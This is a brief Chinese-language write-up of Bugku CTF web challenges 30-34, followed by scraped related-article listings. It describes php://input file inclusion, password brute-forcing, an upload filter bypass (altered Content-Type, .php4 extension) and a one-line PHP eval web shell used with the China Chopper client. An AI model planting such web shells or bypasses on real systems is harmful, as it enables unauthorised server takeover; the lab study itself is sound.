【说明】 整合资源 简略版本2020Bugku write up

web30
关键字: txt or file_get_contents(fn)知识点:filegetcontents(fn) 知识点: file_get_contents(fn)知识点:fileg​etc​ontents(fn) 联想 php://input
步骤:
1.1 可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容

2.1 根据提示 ?ac=bugku&fn=flag.txt
https://blog.csdn.net/baidu_39504221/article/details/111578802

web 31 好像需要管理员
构造 提示:/resusl.php?x=admin
步骤:1.抓包

  1. 打开发现代码 爆破密码passwd : admin

web 32 (无解)
关键字:
知识点:
步骤:头部Content-Type: multipart/form-data;中的multipart改成Multipart,即Content-Type: Multipart/form-data;,再将上传文件的后缀改成php4,最后再改改Content-Type: image/png
参考链接:https://blog.csdn.net/s11show_163/article/details/104585686
https://blog.csdn.net/EC_Carrot/article/details/111630819
知识点:https://blog.csdn.net/lilongsy/article/details/108149819

web 33
关键字: php加解密
https://blog.csdn.net/weixin_33682790/article/details/94573445

web 34
关键字: 中国菜刀 病毒脚本拿权限
知识点: view-source

步骤:
1.view-source发现 upload.php
2.一句话上传病毒 <?php phpinfo(); eval($_POST['test']); ?> 发现<?php ?>一头一尾被替换
3.修改为 上传
4.上传后成功绕过

5.首页右键添加 选择php脚本 填写test密码

6.在根目录里面找到flag

https://blog.csdn.net/baidu_39504221/article/details/111593339

未完待续

[Bugku][Web][CTF] 30-33 write up相关推荐

  1. [Bugku][Web][CTF] 9-15 write up

    [说明] 整合资源 简略版本2020Bugku write up Bugku Web第九题 关键字 :/?args=GLOBALS PHP 将所有全局变量存储在一个名为 $GLOBALS[index] ...

  2. [Bugku][Web][CTF] 16-29 write up

    [说明] 整合资源 简略版本2020Bugku write up web16 备份是个好习惯 /index.php.bak 查看php代码 1.因为md5()函数加密不能处理数组,则key1和key2 ...

  3. 《CTFshow - Web入门》03. Web 21~30

    Web 21~30 web21 知识点 题解 web22 知识点 题解 web23 知识点 题解 web24 知识点 题解 web25 知识点 题解 web26 知识点 题解 web27 知识点 题解 ...

  4. 【BUGKU】CTF >>分析---中国菜刀

    目录 [BUGKU]CTF >>分析---中国菜刀 [BUGKU]CTF >>分析---中国菜刀 解压完成后发现为pcapng文件格式 利用wireshark (我们的小鲨鱼) ...

  5. web前端30个项目列表,学完即可上手做项目

    此篇文章推荐有想法学习前端,已经上路琢磨web前端的朋友们. 之前很多朋友跟我说,自学编程的时候,总是摸不清头脑,一大推问题需要解决,种种书籍需要去啃,字符.单词都需要去记.就感觉要费上很多时间,居然 ...

  6. Bugku Web CTF-江湖魔头1

    Bugku Web CTF-江湖魔头1 这道题比较有意思,简陋的武侠游戏,打开一看大致了解其功能: (1)基础属性可随机 (2)一共有血量.外功.内功等属性,还有金钱,金钱可用来在商店购买秘籍 (3) ...

  7. Bugku Web CTF-江湖魔头2

    Bugku Web CTF-江湖魔头2 (接1) 然而在最初的尝试中却发现,当我填入修改好的cookie时,刷新页面属性值都为空(是为空而不是显示0),于是考虑是否因为逆运算哪里出现了问题. 仔细查看 ...

  8. Bugku web 聪明的php

    Bugku web 聪明的php 模板注入 打开题目 模板注入 打开题目 得到提示,传递参数 随机传一个参数,得到源码 在这地方卡了挺久的,发现smarty是个模板,测试一下是不是模板注入 确实为sm ...

  9. BugKu——Web——社工-初步收集

    BugKu--Web--社工-初步收集 一.解题思路 这里可以下载辅助,下载下来的是一个压缩包,不过会被当做病毒处理,设置成信任的即可,解压出来是个*.exe双击启动即可 随便输一个QQ和密码 回显都 ...

最新文章

  1. liunx学习笔记(一:常用命令)
  2. R语言使用ggplot2可视化凹凸图(bumps chart、凹凸图是一种特殊形式的线图,旨在探索随着时间的推移等级的变化)、并设置凹凸图的线条为曲线而不是直线(change into curves)
  3. 一位软件工程师的6年总结【转】
  4. 【AllJoyn专题】基于AllJoyn和Yeelink的传感器数据上传与指令下行的研究
  5. POI Workbook接口和HSSFWorkbook对象和XSSFWorkbook对象操作相应excel版本
  6. linux限制pptp连接数_性能调优,让你的服务器更强大!增加TCP连接最大限制
  7. fatal error: alsa/asoundlib.h: 没有那个文件或目录错误解决办法
  8. XNOR.ai融资1200万美元
  9. ip登陆异常 php,PHP实例:PHP制作登录异常ip检测功能的实例代码
  10. B 站监控系统的框架、演进与展望
  11. python前端和后端_python是用于前端还是后端开发
  12. 燕山大学计算机辅助设计三级项目报告,《计算机辅助设计Auto CAD》燕山大学
  13. 字符集和编码 UNICODE、ANSI、UTF-8、GB2312 都是什么鬼
  14. python产品作者如何去掉_python去除\ufeff、\xa0、\u3000
  15. 微型计算机字,小型微型计算机系统
  16. MISRA-C那些事儿
  17. 微信小程序 - 气泡菜单组件(仿微信气泡弹框显示菜单)
  18. linux CentOS 7 在线安装 zabbix 官网的思路,最简洁
  19. php字符串拷贝,PHP字符串还原
  20. PDF加密文件不能复制、不能打印的解决办法

热门文章

  1. bullet HashMap 内存紧密的哈希表
  2. Android - 基于Toolbar的Navigation Drawer(Material Design)
  3. vim下php文件中自动缩排html代码
  4. 澳元兑美元震荡整理,后市可否追高
  5. kendo-ui学习笔记——题记
  6. Linux 常用测试命令
  7. android 微信支付,body为中文字符,签名错误
  8. Mysql显示创建表的sql语句
  9. Java遍历Map的4种方式
  10. Android 蓝牙4.0在实际开发中的运用